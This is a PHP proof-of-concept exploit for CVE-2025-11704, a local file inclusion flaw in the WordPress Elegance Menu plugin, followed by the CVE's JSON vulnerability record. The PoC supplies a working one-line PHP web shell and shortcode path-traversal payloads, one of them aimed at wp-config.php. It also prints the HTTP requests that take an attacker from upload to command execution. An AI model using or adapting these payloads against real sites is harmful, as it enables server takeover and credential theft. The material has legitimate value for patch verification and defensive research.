CVE-2025-11704

<?php // CVE-2025-11704 PoC - WordPress Elegance Menu LFI to RCE // Author: Security Researcher // Target: Elegance Menu Plugin <= 1.9 for WordPress /** * This PoC demonstrates Local File Inclusion vulnerability in Elegance Menu plugin. * Attack requires Contributor-level access or higher in WordPress. * * Step 1: Upload malicious PHP file via WordPress media upload * Step 2: Include the uploaded file via LFI vulnerability * Step 3: Execute arbitrary code */ // Malicious PHP file content to upload (shell.php) $malicious_code = '<?php if(isset($_GET["cmd"])) { system($_GET["cmd"]); exit; } ?>\n'; // LFI payload for shortcode $lfi_payload = '[elegance-menu elegance-menu="../../uploads/2025/11/shell.php"]'; // Alternative: Target common WordPress files $lfi_payload_alt = '[elegance-menu elegance-menu="../../wp-config.php"]'; // Path traversal variants $path_traversal_variants = [ "../../uploads/shell.php", "....//....//....//....//uploads/shell.php", "..\..\..\..\uploads\shell.php", "/var/www/html/wp-content/uploads/shell.php" ]; echo "[*] CVE-2025-11704 - Elegance Menu LFI to RCE PoC\n"; echo "[*] Target: WordPress with Elegance Menu Plugin <= 1.9\n"; echo "[*] Required: Contributor-level access\n\n"; // Generate HTTP request for exploitation echo "[+] Step 1: Upload malicious PHP file via WordPress media\n"; echo "[+] Step 2: Use shortcode to include the file:\n"; echo "POST /wp-admin/admin-ajax.php HTTP/1.1\n"; echo "Host: target.com\n"; echo "Content-Type: application/x-www-form-urlencoded\n"; echo "\n"; echo "action=elegance_menu&shortcode=" . urlencode($lfi_payload) . "\n"; echo "\n[+] Step 3: Execute commands via uploaded shell:\n"; echo "GET /wp-content/uploads/shell.php?cmd=id HTTP/1.1\n"; echo "Host: target.com\n"; ?>

{"cve": {"id": "CVE-2025-11704", "sourceIdentifier": "[email protected]", "published": "2025-11-04T05:15:53.957", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Elegance Menu plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 1.9 via the 'elegance-menu' attribute of the `elegance-menu` shortcode. This makes it possible for authenticated attackers, with Contributor-level access and above, to include and execute arbitrary .php files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where .php file types can be uploaded and included."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.6, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-98"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/elegance-menu/trunk/public/class-elegance-menu-public.php#L222", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset/3409312/", "source": "[email protected]"}, {"url": "https://wordpress.org/plugins/elegance-menu", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/9cecce4d-5d4a-4286-97dc-88a379e21b60?source=cve", "source": "[email protected]"}]}}